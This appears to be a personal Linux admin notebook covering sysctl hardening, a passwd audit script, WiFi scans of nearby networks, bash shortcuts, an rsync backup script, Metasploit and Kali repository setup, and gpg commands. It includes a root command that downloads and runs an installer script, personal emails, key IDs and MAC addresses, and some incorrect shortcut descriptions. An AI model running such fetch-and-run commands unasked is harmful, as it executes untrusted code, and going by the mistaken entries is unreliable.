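# constructed subset of the hardening settings
net.ipv4.ip_forward = 0
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.log_martians = 1
net.ipv4.ip_local_port_range = 2000 65000
net.ipv4.tcp_rfc1337=1
EOF
    printf '%s\n' \
        'net.ipv4.ip_forward = 1' \
        'net.ipv4.tcp_syncookies = 1' \
        'net.ipv4.conf.all.log_martians = 0' \
        'kernel.sysrq = 0' > "$d/running.txt"
    printf 'net.ipv4.ip_local_port_range = 2000\t65000\n' >> "$d/running.txt"
    sysctl_drift "$d/want.conf" "$d/running.txt"
    rm -rf "$d"
}

sysctl_drift_demo
```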
---[Viewing log messages]--- (top)
# journalctl
# journalctl -u network.service
# journalctl -u ssh.service
# journalctl -f
# journalctl -k
---[Check for accounts with root access]--- (top)
Only the root account has UID 0, which carries full permissions on the system. Type the following command to display all accounts with UID set to 0:
# awk -F: '($3 == "0") {print}' /etc/passwd
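The same awk pass can catch the neighbouring problems as well: a second UID-0 account, an empty password field, two accounts sharing a UID, and records that do not even have seven fields. The audit below is an added example that is not part of the original notes; passwd_audit is a name chosen here, and the demo runs it over a constructed passwd file rather than the real /etc/passwd.

```shell
#!/bin/sh
# Added example, not from the original notes: widen the UID-0 check into a
# small passwd audit.  Reports extra UID-0 accounts, empty password fields,
# shared UIDs and malformed records.  Pass a file path; defaults to /etc/passwd.
passwd_audit() {
    awk -F: '
        NF != 7                 { printf "MALFORMED line %d: %s\n", NR, $0; next }
        $3 == 0 && $1 != "root" { printf "UID0 %s\n", $1 }                 # second superuser
        $2 == ""                { printf "NOPASS %s\n", $1 }               # no password at all, not even an x
        ($3 in seen)            { printf "DUPUID %s shares uid %s with %s\n", $1, $3, seen[$3] }
        !($3 in seen)           { seen[$3] = $1 }                          # remember first owner of each uid
    ' "${1:-/etc/passwd}"
}

# Constructed passwd file exercising each finding; not a real system file.
passwd_audit_demo() {
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:second root:/root:/bin/bash
guest::1001:1001:Guest:/home/guest:/bin/bash
parth:x:1000:1000:parth:/home/parth:/bin/bash
svc:x:1000:1000:service:/var/lib/svc:/bin/sh
broken:x:1002:1002:/home/broken
EOF
    passwd_audit "$f"
    rm -f "$f"
}

passwd_audit_demo
```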
---[Report services and runlevels]--- (top)
Print a list of services showing which runlevels each is configured on or off for
# systemctl list-unit-files --type=service
# systemctl list-dependencies graphical.target
---[cups]--- (top)
You can access CUPS from a browser. Fire up your browser and go to the following URL.
http://localhost:631/
---[List available access points]--- (top)
$ nmcli dev wifi list
IN-USE  SSID                           MODE   CHAN  RATE        SIGNAL  BARS  SECURITY
        ATTFJ4Br3A                     Infra  6     195 Mbit/s  100     ▂▄▆█  WPA2
        --                             Infra  153   540 Mbit/s  100     ▂▄▆█  WPA2
        ATTFJ4Br3A                     Infra  153   540 Mbit/s  89      ▂▄▆█  WPA2
        ATTB2f6CTA                     Infra  6     195 Mbit/s  85      ▂▄▆█  WPA2
        --                             Infra  153   130 Mbit/s  79      ▂▄▆_  WPA2
        --                             Infra  1     130 Mbit/s  75      ▂▄▆_  WPA2
        ATTB2f6CTA                     Infra  153   540 Mbit/s  62      ▂▄▆_  WPA2
        --                             Infra  153   540 Mbit/s  59      ▂▄▆_  WPA2
        DIRECT-65-HP ENVY 4510 series  Infra  11    65 Mbit/s   49      ▂▄__  WPA2
        --                             Infra  153   405 Mbit/s  45      ▂▄__  WPA2
        ATTB2f6CTA                     Infra  1     130 Mbit/s  42      ▂▄__  WPA2
        Peasants                       Infra  11    130 Mbit/s  42      ▂▄__  WPA2
        ATTB2f6CTA                     Infra  153   405 Mbit/s  42      ▂▄__  WPA2
        ATTPSHiJ4I                     Infra  1     195 Mbit/s  39      ▂▄__  WPA2
        ATTAG2GTA2                     Infra  1     195 Mbit/s  39      ▂▄__  WPA2
        NewThermostat_B75111           Infra  6     65 Mbit/s   35      ▂▄__  --
        ARRIS-7FDB                     Infra  11    195 Mbit/s  35      ▂▄__  WPA2
        belkin.e80_2GEXT               Infra  2     270 Mbit/s  32      ▂▄__  WPA2
        Nobility                       Infra  11    130 Mbit/s  32      ▂▄__  WPA2
        ATTMaSk44I                     Infra  1     195 Mbit/s  29      ▂___  WPA2
        Serenity                       Infra  8     130 Mbit/s  29      ▂___  WPA2
IN-USE  SSID                           MODE   CHAN  RATE        SIGNAL  BARS  SECURITY
*       ATTFJ4Br3A                     Infra  6     195 Mbit/s  76      ▂▄▆_  WPA2
$ sudo lshw -C network
  *-network
       description: Ethernet interface
       product: RTL810xE PCI Express Fast Ethernet controller
       vendor: Realtek Semiconductor Co., Ltd.
       physical id: 0
       bus info: pci@0000:01:00.0
       logical name: enp1s0
       version: 07
       serial: 74:86:7a:5d:35:b1
       size: 10Mbit/s
       capacity: 100Mbit/s
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation
       configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3LK-NAPI duplex=half firmware=rtl8106e-1_0.0.1 06/29/12 latency=0 link=no multicast=yes port=MII speed=10Mbit/s
       resources: irq:18 ioport:3000(size=256) memory:b0600000-b0600fff memory:b0400000-b0403fff
  *-network DISABLED
       description: Wireless interface
       product: Wireless 7260
       vendor: Intel Corporation
       physical id: 0
       bus info: pci@0000:02:00.0
       logical name: wlp2s0
       version: 73
       serial: fc:f8:ae:26:86:ee
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
       configuration: broadcast=yes driver=iwlwifi driverversion=4.15.0-65-generic firmware=17.948900127.0 ip=192.168.1.72 latency=0 link=no multicast=yes wireless=IEEE 802.11
       resources: irq:47 memory:b0500000-b0501fff
  *-network
       description: Wireless interface
       physical id: 2
       bus info: usb@1:1.3
       logical name: wlx00c0ca8f2b07
       serial: 00:c0:ca:8f:2b:07
       capabilities: ethernet physical wireless
       configuration: broadcast=yes driver=rt2800usb driverversion=4.15.0-65-generic firmware=0.36 ip=192.168.1.73 link=yes multicast=yes wireless=IEEE 802.11
ben@ben-b:~$ sudo iwlist wlp2s0 scan
Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 420100 IE: Unknown: 46057208010000 IE: Unknown: 2D1AEF0917FFFFFF0000000000000000 000000000000000000000000 IE: Unknown: 3D16990F1500000000000000000000000 000000000000000 IE: Unknown: 7F080400080000000040 IE: Unknown: 450B8500000000000000000000 IE: Unknown: BF0CB259820FEAFF0000EAFF0000 IE: Unknown: C005019B000000 IE: Unknown: C30402020202 IE: Unknown: DD4D0050F204104A0001101044000102104700109392C0 34F0717F0BE563560D19D4FB8E103C0001021049000600 372A00012010580018E02F603829387C2ED6909E6406A0 2B500001010103007FC5 IE: Unknown: DD090010180201001C0000 IE: Unknown: DD180050F2020101040003A4000027A400 0042435E0062322F00 Cell 06 - Address: AA:17:B8:45:0D:64 Channel:153 Frequency:5.765 GHz Quality=28/70 Signal level=-82 dBm Encryption key:on ESSID:"\x00\x00\x00\x00\x00\x00\x00\x00\x00" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 0009000000000000000000 IE: Unknown: 01088C129824B048606C IE: Unknown: 050400010000 IE: Unknown: 074655532024011E28011E2C011E30011E34011E38011E3 C011E40011E64011E68011E6C011E70011E74011E84011E 88011E8C011E90011E95011E99011E9D011EA1011EA5011E00 IE: Unknown: 200102 IE: Unknown: 23021400 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 420100 IE: Unknown: 2D1AEF0917FFFFFF00000000000000000 00000000000000000000000 IE: Unknown: 3D16990F1500000000000000000000000 000000000000000 IE: Unknown: 7F080400080000000040 IE: Unknown: 450B8500000000000000000000 IE: Unknown: BF0CB259820FEAFF0000EAFF0000 IE: Unknown: C005019B000000 IE: Unknown: C30402020202 IE: Unknown: DD090010180200001C0000 IE: Unknown: DD180050F2020101800003A4000027A40 00042435E0062322F00 Cell 07 - Address: 30:E1:71:B2:B8:66 Channel:1 Frequency:2.412 GHz (Channel 1) Quality=28/70 Signal level=-82 dBm Encryption key:on 
ESSID:"DIRECT-65-HP ENVY 4510 series" Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 001D4449524543542D36352D485020454 E5659203435313020736572696573 IE: Unknown: 01088C129824B048606C IE: Unknown: 030101 IE: Unknown: 200100 IE: Unknown: 23021400 IE: Unknown: 2A0100 IE: Unknown: 2F0100 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 2D1A20001AFF0000000000000000000000 0000000000000000000000 IE: Unknown: 3D16010800000000000000000000000000 00000000000000 IE: Unknown: DD090010180200000C0000 IE: Unknown: DD180050F202010188000364000027A400 0041435E0061322F00 IE: Unknown: DDC10050F204104A000110104400010210570001011 041000100103B000103104700101C852A4DB8001F08 ABCD30E171B2B86510210002485010230011454E565 9203435313020736572696573001024000534353132 001042001054483643433444304A593036384800001 054000800030050F20400051011001D444952454354 2D36352D485020454E5659203435313020736572696 5731008000200001049000600372A00012010490017 000137100600101C852A4DB8001F08ABCD30E171B2B865 IE: Unknown: DD5F080009000400000007010201000311454E56592 0343531302073657269657300040534353132000510 54483643433444304A5930363848000006101C852A4 DB8001F08ABCD30E171B2B8650704C0A8010A080200D4090200080A0400000001 Cell 08 - Address: A0:04:60:35:2D:C5 Channel:7 Frequency:2.442 GHz (Channel 7) Quality=27/70 Signal level=-83 dBm Encryption key:on ESSID:"Serenity" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 0008536572656E697479 IE: Unknown: 010882840B162430486C IE: Unknown: 030107 IE: Unknown: 050400020000 IE: Unknown: 2A0104 IE: Unknown: 2F0104 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 32040C121860 
IE: Unknown: 2D1AFC181FFFFF00000000000000000000 0000000000000000000000 IE: Unknown: 3D1607001700000000000000000000000 000000000000000 IE: Unknown: 4A0E14000A002C01C800140005001900 IE: Unknown: 7F0101 IE: Unknown: DD310050F204104A000110104400010210470010A21532 ABF96932FFFC3498EB23C50E74103C0001031049000600372A000120 IE: Unknown: DD090010180205F0040000 IE: Unknown: DD180050F2020101800003A4000027A40 00042435E0062322F00 Cell 09 - Address: BC:A5:11:99:2E:38 Channel:11 Frequency:2.462 GHz (Channel 11) Quality=66/70 Signal level=-44 dBm Encryption key:on ESSID:"ATTFJ4Br3A_2GEXT" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 9 Mb/s; 12 Mb/s; 18 Mb/s Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 0010415454464A34427233415F3247455854 IE: Unknown: 010882848B960C121824 IE: Unknown: 03010B IE: Unknown: 0706555320010B1E IE: Unknown: 2A0104 IE: Unknown: 32043048606C IE: Unknown: 2D1AAD0903FFFF000000000000000000000 100000000000000000000 IE: Unknown: 3D160B00000000000000000000000000000 0000000000000 IE: Unknown: 4A0E14000A002C01C800140005001900 IE: Unknown: 7F0801000F0200000040 IE: Unknown: BF0CB2498933FAFF0000FAFF0000 IE: Unknown: C005000000FCFF IE: Unknown: DD180050F2020101800003A4000027A400 0042435E0062322F00 IE: Unknown: DD0900037F01010000FF7F IE: Unknown: DD870050F204104A0001101044000102103B0001031047 0010876543219ABCDEF01234BCA511992E38102100044E 5447521023000845583631353076321024000256321042 000D344C56363942355941303044361054000800060050 F204000110110015455836313530763228576972656C65 7373204150291008000220081049000600372A000120 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK Cell 10 - Address: C8:52:61:97:05:B0 Channel:11 Frequency:2.462 GHz (Channel 11) Quality=70/70 Signal level=-34 dBm Encryption key:on ESSID:"ATTFJ4Br3A" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 
12 Mb/s; 48 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 000A415454464A3442723341 IE: Unknown: 010882848B962430486C IE: Unknown: 03010B IE: Unknown: 2A0100 IE: Unknown: 32040C121860 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 0B050200160000 IE: Unknown: 46053208010000 IE: Unknown: 2D1AAD091FFFFFFF000000000000000000 0000000000000000000000 IE: Unknown: 3D160B0804000000000000000000000000 00000000000000 IE: Unknown: 7F080400080000000040 IE: Unknown: DD930050F204104A0001101044000102103B00010310 47001059C70E96DA715048FF831CC2D0E4C1E5102100 0B41727269732C20496E632E1023000A424757323130 2D3730301024000A4247573231302D3730301042000A 4247573231302D3730301054000800060050F2040001 1011000E417272697320576972656C65737310080002 2008103C0001011049000600372A000120 IE: Unknown: DD090010180202101C0000 IE: Unknown: DD180050F2020101840003A4000027A 4000042435E0062322F00 Cell 11 - Address: 94:8F:CF:75:BE:00 Channel:11 Frequency:2.462 GHz (Channel 11) Quality=51/70 Signal level=-59 dBm Encryption key:on ESSID:"ATTB2f6CTA" Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 18 Mb/s 24 Mb/s; 36 Mb/s; 54 Mb/s Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 48 Mb/s Mode:Master Extra:tsf=0000000000000000 Extra: Last beacon: 24ms ago IE: Unknown: 000A41545442326636435441 IE: Unknown: 010882848B962430486C IE: Unknown: 03010B IE: Unknown: 2A0100 IE: Unknown: 32040C121860 IE: IEEE 802.11i/WPA2 Version 1 Group Cipher : CCMP Pairwise Ciphers (1) : CCMP Authentication Suites (1) : PSK IE: Unknown: 0B050000250000 IE: Unknown: 46053208010000 IE: Unknown: 2D1AAD091FFFFFFF0000000000000 000000000000000000000000000 IE: Unknown: 3D160B08110000000000000000000 0000000000000000000 IE: Unknown: 7F080400080000000040 IE: Unknown: DD930050F204104A0001101044000102103B000103 10470010A61ECC86A44EB89E90A0F6E896C6224010 21000B41727269732C20496E632E1023000A424757 3231302D3730301024000A4247573231302D373030 
1042000A4247573231302D37303010540008000600 50F20400011011000E417272697320576972656C65 7373100800022008103C0001011049000600372A000120 IE: Unknown: DD090010180200101C0000 IE: Unknown: DD180050F2020101840003A4000027 A4000042435E0062322F00
---[Bash]--- (top)
Bash Keyboard Shortcuts

Moving the cursor:
Ctrl + a   Go to the beginning of the line (Home)
Ctrl + e   Go to the end of the line (End)
Ctrl + p   Previous command (Up arrow)
Ctrl + n   Next command (Down arrow)
Alt + b    Back (left) one word
Alt + f    Forward (right) one word
Ctrl + f   Forward one character
Ctrl + b   Backward one character
Ctrl + xx  Toggle between the start of line and current cursor position

Editing:
Ctrl + L   Clear the screen, similar to the clear command
Alt + Del  Delete the word before the cursor
Alt + d    Delete the word after the cursor
Ctrl + d   Delete character under the cursor
Ctrl + h   Delete character before the cursor (Backspace)
Ctrl + w   Cut the word before the cursor to the clipboard
Ctrl + k   Cut the line after the cursor to the clipboard
Ctrl + u   Cut/delete the line before the cursor to the clipboard
Alt + t    Swap current word with previous
Ctrl + t   Swap the last two characters before the cursor (typo)
Esc + t    Swap the last two words before the cursor
Ctrl + y   Paste the last thing to be cut (yank)
Alt + u    Upper-case every character from the cursor to the end of the current word
Alt + l    Lower-case every character from the cursor to the end of the current word
Alt + c    Capitalize the character under the cursor and move to the end of the word
Alt + r    Cancel the changes and put back the line as it was in the history (revert)
Ctrl + _   Undo
TAB        Tab completion for file/directory names. For example, to move to a directory 'sample1', type cd sam, then press TAB and ENTER. Type just enough characters to uniquely identify the directory you wish to open.

Special keys: Tab, Backspace, Enter, Esc
Text terminals send characters (bytes), not key strokes. Special keys such as Tab, Backspace, Enter and Esc are encoded as control characters. Control characters are not printable; they display in the terminal as ^ and are intended to have an effect on applications.
Ctrl+I = Tab
Ctrl+J = Newline
Ctrl+M = Enter
Ctrl+[ = Escape
Many terminals will also send control characters for keys in the digit row:
Ctrl+2  ^@
Ctrl+3  ^[  Escape
Ctrl+4  ^\
Ctrl+5  ^]
Ctrl+6  ^^
Ctrl+7  ^_  Undo
Ctrl+8  ^?  Backward-delete-char
Ctrl+v tells the terminal not to interpret the following character, so Ctrl+v Ctrl+I will display a tab character; similarly Ctrl+v ENTER will display the escape sequence for the Enter key: ^M

History:
Ctrl + r   Recall the last command including the specified character(s); searches the command history as you type. Equivalent to: vim ~/.bash_history
Ctrl + p   Previous command in history (i.e. walk back through the command history)
Ctrl + n   Next command in history (i.e. walk forward through the command history)
Ctrl + s   Go back to the next most recent command (beware not to execute it from a terminal because this will also launch its XOFF)
Ctrl + o   Execute the command found via Ctrl+r or Ctrl+s
Ctrl + g   Escape from history searching mode
!!         Repeat last command
!n         Repeat from the last command: argument n, e.g. !:2 for the second argument
!n:m       Repeat from the last command: arguments n to m, e.g. !:2-3 for the second and third
!n:$       Repeat from the last command: arguments n to the last argument
!n:p       Print last command starting with n
!$         Last argument of previous command
ALT + .    Last argument of previous command
!*         All arguments of previous command
^abc^def   Run previous command, replacing abc with def

Process control:
Ctrl + C   Interrupt/kill whatever you are running (SIGINT)
Ctrl + l   Clear the screen
Ctrl + s   Stop output to the screen (for long running verbose commands). Then use PgUp/PgDn for navigation
Ctrl + q   Allow output to the screen (if previously stopped using the command above)
Ctrl + D   Send an EOF marker; unless disabled by an option, this will close the current shell (EXIT)
Ctrl + Z   Send the signal SIGTSTP to the current task, which suspends it. To return to it later enter fg 'process name' (foreground)

ALT key shortcuts
1. ALT+A - Go to the beginning of a line.
2. ALT+B - Move one character before the cursor.
3. ALT+C - Suspends the running command/process. Same as CTRL+C.
4. ALT+D - Closes the empty Terminal (i.e. it closes the Terminal when there is nothing typed). Also deletes all characters after the cursor.
5. ALT+F - Move forward one character.
6. ALT+T - Swaps the last two words.
7. ALT+U - Capitalize all characters in a word after the cursor.
8. ALT+L - Uncapitalize all characters in a word after the cursor.
9. ALT+R - Undo any changes to a command that you have brought from the history if you've edited it.
10. ALT+. (note the dot at the end) - Use the last word of the previous command.

CTRL key shortcuts
1. CTRL+A - Quickly move to the beginning of line.
2. CTRL+B - Move backward one character, i.e. one character before the cursor. Alternatively, you can use the LEFT arrow.
3. CTRL+C - Stop the currently running command. If a command takes too long to complete or if you mistakenly run it, you can forcibly stop or quit the command by using CTRL+C.
4. CTRL+D - Delete one character backward. If you have a system where the BACKSPACE key isn't working, you can use CTRL+D to delete one character backward. This shortcut also lets you log out of the current session, similar to exit.
5. CTRL+E - Move to the end of line. After you have corrected a misspelled word at the start of a command or line, hit CTRL+E to quickly move to the end of the line. Alternatively, you can use the END key.
6. CTRL+F - Move forward one character. If you want to move the cursor forward one character at a time, press CTRL+F instead of the RIGHT arrow key.
7. CTRL+G - Leave the history searching mode without running the command.
8. CTRL+H - Delete the character before the cursor, same as BACKSPACE.
9. CTRL+J - Same as ENTER/RETURN key. Tip: ENTER key not working? CTRL+J or CTRL+M can be used as an alternative to the ENTER key.
10. CTRL+K - Delete all characters after the cursor. You don't have to keep hitting the DELETE key; just press CTRL+K to delete all characters after the cursor.
11. CTRL+L - Clears the screen and redisplays the line. Don't type "clear" to clear the screen; just press CTRL+L to clear and redisplay the currently typed line.
12. CTRL+M - Same as CTRL+J or RETURN.
13. CTRL+N - Display the next line in command history. You can also use the DOWN arrow.
14. CTRL+O - Run the command that you found using reverse search, i.e. CTRL+R.
15. CTRL+P - Display the previous line in command history. You can also use the UP arrow.
16. CTRL+R - Searches the history backward (reverse search).
17. CTRL+S - Searches the history forward.
18. CTRL+T - Swaps the last two characters.
19. CTRL+U - Delete all characters before the cursor (kills backward from point to the beginning of line). This shortcut deletes all typed characters backward at once.
20. CTRL+V - Makes the next character typed verbatim.
21. CTRL+W - Delete the word before the cursor.
22. CTRL+X - Lists the possible filename completions of the current word.
23. CTRL+XX - Move between the start of the command line and the current cursor position (and back again).
24. CTRL+Y - Retrieves the last item that you deleted or cut.
25. CTRL+Z - Stops the current command.
26. CTRL+[ - Equivalent to the ESC key.

Miscellaneous
1. !! - Repeats the last command.
2. ESC+t - Swaps the last two words.
Additional history expansions:
!string    Print the last command beginning with string.
!:q        Quote the last command with proper Bash escaping applied. Tip: enter a line of Bash starting with a # comment, then run !:q on the next line to escape it.
# Disable exit on non-zero status
set +e
# Do something. If something fails with exit != 0, the script continues anyway.
# Enable exit on non-zero status
set -e
# Do something. If something fails with exit != 0, the script stops.
https://wiki.archlinux.org/title/Rsync#Full_system_backup
Full system backup
This section is about using rsync to transfer a copy of the entire / tree, excluding a few selected directories. This approach is considered to be better than disk cloning with dd since it allows for a different size, partition table and filesystem to be used, and better than copying with cp -a as well, because it allows greater control over file permissions, attributes, Access Control Lists and extended attributes.
rsync will work even while the system is running, but files changed during the transfer may or may not be transferred, which can cause undefined behavior of some programs using the transferred files.
This approach works well for migrating an existing installation to a new hard drive or SSD.
Run the following command as root to make sure that rsync can access all system files and preserve the ownership:
# rsync -aAXHv --exclude={"/dev/*","/proc/*","/sys/*","/tmp/*","/run/*","/mnt/*","/media/*","/lost+found"} / /path/to/backup
Actual command used in production (note that the brace list must contain no spaces, or the shell will not expand it):
rsync -aAXHv --progress --exclude={"/dev/*","/home/*","/proc/*","/sys/*","/tmp/*","/run/*","/mnt/*","/media/*","/lost+found"} / /media/parth/SYSBKUP/Mike
If you are running this multiple times to the same backup directory, make sure that the source path does not end with /*, or this option will only have an effect on the files inside the subdirectories of the source directory and none on the files residing directly inside the source directory.
If you use any sparse files, such as virtual disks, Docker images and similar, you should add the -S option.
The --numeric-ids option disables mapping of user and group names; instead, numeric user and group IDs are transferred. This is useful when backing up over SSH or when using a live system to back up a different system disk.
Choosing --info=progress2 option instead of -v will show the overall progress info and transfer speed instead of the list of files being transferred.
To avoid crossing a filesystem boundary when recursing, add the option -x/--one-file-system. This will prevent backing up any mount point in the hierarchy.
Restore a backup
If you wish to restore a backup, use the same rsync command that was executed but with the source and destination reversed.
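Added example for the full-system backup procedure above; it is not the Arch wiki's or this page's own script. It builds the exclude-aware rsync command from the page's pattern list and refuses a destination that would sit inside the tree being copied (a destination under / that is not excluded gets copied into itself on every later run). Function names, the mode argument and the ONEFS/DRYRUN switches are mine; POSIX sh and paths without whitespace are assumed.

```shell
#!/bin/sh
# Exclude patterns copied from the page's rsync command. None contains whitespace,
# so the string can be word-split safely as long as globbing is off (set -f).
EXCLUDES='/dev/* /proc/* /sys/* /tmp/* /run/* /mnt/* /media/* /lost+found'

# Print "yes" (status 0) when DEST is itself skipped by the exclude list, "no"
# (status 1) otherwise. /media/parth/SYSBKUP/Mike is covered by "/media/*";
# a destination such as /backup is not, and rsync would recurse into it.
dest_covered_by_excludes() {
  dest=$1
  set -f                                # keep the shell from expanding the '*'
  for pat in $EXCLUDES; do
    case $pat in
      */\*)                             # "/media/*": anything at or below /media
        dir=${pat%/\*}
        case $dest in
          "$dir"|"$dir"/*) set +f; echo yes; return 0 ;;
        esac ;;
      *)                                # exact entry such as /lost+found
        if [ "$dest" = "$pat" ]; then set +f; echo yes; return 0; fi ;;
    esac
  done
  set +f
  echo no
  return 1
}

# Print the rsync invocation one argument per line so it can be reviewed before
# it runs. MODE is "verbose" for the page's -v or "progress" for --info=progress2.
# ONEFS=1 adds --one-file-system (the page's -x); DRYRUN=1 adds --dry-run.
build_backup_cmd() {
  src=$1; dst=$2; mode=${3:-verbose}
  case $src in
    */\*) echo "source must not end in /*: $src" >&2; return 2 ;;
  esac
  set -- rsync -aAXH
  if [ "$mode" = progress ]; then set -- "$@" --info=progress2; else set -- "$@" -v; fi
  if [ "${ONEFS:-0}" = 1 ]; then set -- "$@" --one-file-system; fi
  if [ "${DRYRUN:-0}" = 1 ]; then set -- "$@" --dry-run; fi
  set -f
  for pat in $EXCLUDES; do set -- "$@" --exclude="$pat"; done
  set +f
  set -- "$@" "$src" "$dst"
  printf '%s\n' "$@"
}

# Pre-flight checks, then the backup itself.
# Usage: run_backup / /media/parth/SYSBKUP/Mike [verbose|progress]
run_backup() {
  src=$1; dst=$2; mode=${3:-verbose}
  if [ "$(id -u)" -ne 0 ]; then
    echo "run as root so rsync can read every file and preserve ownership" >&2; return 1
  fi
  if [ ! -d "$dst" ]; then
    echo "destination $dst does not exist (is the backup disk mounted?)" >&2; return 1
  fi
  if ! dest_covered_by_excludes "$dst" >/dev/null; then
    echo "refusing: $dst lies under / but is not excluded, so the backup would copy itself" >&2
    return 1
  fi
  args=$(build_backup_cmd "$src" "$dst" "$mode") || return 2
  echo "$args" | sed 's/^/  /' >&2       # show the exact command line before running it
  set -f
  set -- $args                            # split on whitespace; paths are assumed to have none
  set +f
  "$@"
}
```

Source the file and call run_backup as root; with DRYRUN=1 it previews the file list without writing anything.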
---[metasploit framework]--- (top)
To install
$ sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
To update
$ apt update; apt install metasploit-framework
To start the postgresql db (and the other metasploit services), run the command:
$ sudo /opt/metasploit/ctlscript.sh start
[sudo] password for parth:
/opt/metasploit/postgresql/scripts/ctl.sh : postgresql started at port 7337
prosvc is starting
nginx is starting
metasploit is starting
Worker starting in background
After the database starts, you can use any of the following commands to manage the database:
$ msfdb status
Database started at /home/parth/.msf4/db
MSF web service is running as PID 7501
Launch the console with this command. Note you have to be in /opt/metasploit-framework/bin when you run this command:
parth@wintermute:/opt/metasploit-framework/bin$ ./msfconsole
To stop the metasploit daemon:
$ /etc/init.d/metasploit stop
File locations
---[apt]--- (top)
09.28.19 I used this to add the Kali repository key to apt so I could install apps from there.
$ gpg --keyserver hkp://keys.gnupg.net --recv-key 7D8D0BF6
$ gpg --fingerprint 7D8D0BF6
$ gpg -a --export 7D8D0BF6 > kali.key
$ sudo apt-key add kali.key
$ sudo apt-key update
This gave me the following message:
1867 packages can be upgraded. Run 'apt list --upgradable' to see them.
Looking at the list, it looks like it might replace much of Mint, so I removed the Kali repository line (deb http://http.kali.org/kali kali-rolling main non-free contrib) from the /etc/apt/sources.list file.
List the packages that have upgrades available.
$ sudo apt list --upgradable
List installed packages
$ apt list --installed
Update the local package database
$ sudo apt update
Upgrade installed packages
$ sudo apt upgrade
There is another way to provide a complete upgrade by using the command below:
$ sudo apt full-upgrade
Install a new package
$ sudo apt install (package_name)
List upgradable packages
$ sudo apt list --upgradable
$ sudo apt list --upgradable | less
List available packages
$ apt-cache search (package_name or keyword)
Removing a package
$ sudo apt remove (package_name)
Remove a package, along with all configuration files etc...
$ sudo apt purge (package_name)
$ apt-cache dumpavail | grep Description: | grep record
More examples
To list the installed packages on your Ubuntu system use the following commands:
$ sudo apt list --installed
$ sudo apt list --installed | grep screen
$ sudo dpkg-query -l | less
$ sudo dpkg-query -l | grep package_name
To create a list of the names of all installed packages on your Ubuntu or Debian system and save it in a file named packages_list.txt, run the following command:
$ sudo dpkg-query -f '${binary:Package}\n' -W > packages_list.txt
Now that you have the list, if you want to install the same packages on your new server you can do that with:
$ sudo xargs -a packages_list.txt apt install
---[gnupg gpg examples]--- (top)
The GPA GUI app can be used for most functions.
To encrypt a file:
$ gpg -e --sign -r WBBellamy@gmail.com name_of_file
To decrypt a file:
$ gpg file_name
Symmetric encryption means that you use the same key to both encrypt and decrypt a file. To encrypt a file with minimal effort, you could use a command like this:
$ gpg2 --symmetric myfile
This command will leave you with two files — myfile and myfile.gpg. Once you verify that the encrypted version of your original file has been created, you can use the shred command to securely remove the original file in a way that prevents it from being scraped off the disk with some disk recovery tool. During the encryption process, this command will also open up a tool on your desktop to prompt you twice to enter your passphrase. So, you have to be working on the desktop.
Change your GPG key’s passphrase
gpg --passwd nick@example.com
Export your GPG public key
# Echo your public key to stdout.
gpg --export --armor nick@example.com
# Write your public key to a file.
gpg --export --armor --output nickexample.gpg.pub nick@example.com
Get a gpg Key
$ gpg -k "05AE85193A16AC7B"
pub   rsa3072 2020-12-03 [SC]
      96606AD4E8214AF6EE20F84805AE85193A16AC7B
uid           [ultimate] William Ben Bellamy Jr
sub   rsa3072 2020-12-03 [E]
sub   rsa4096 2020-12-03 [E]
# Revoke the GPG key.
gpg --import revoke-nickexample.asc
Edit your GPG key’s expiration date
gpg --edit-key nick@example.com
# key 0
# expire [pick a new exp date]
# key 1
# expire [pick a new exp date]
# save
List your GPG keys
gpg --list-keys
Edit your key
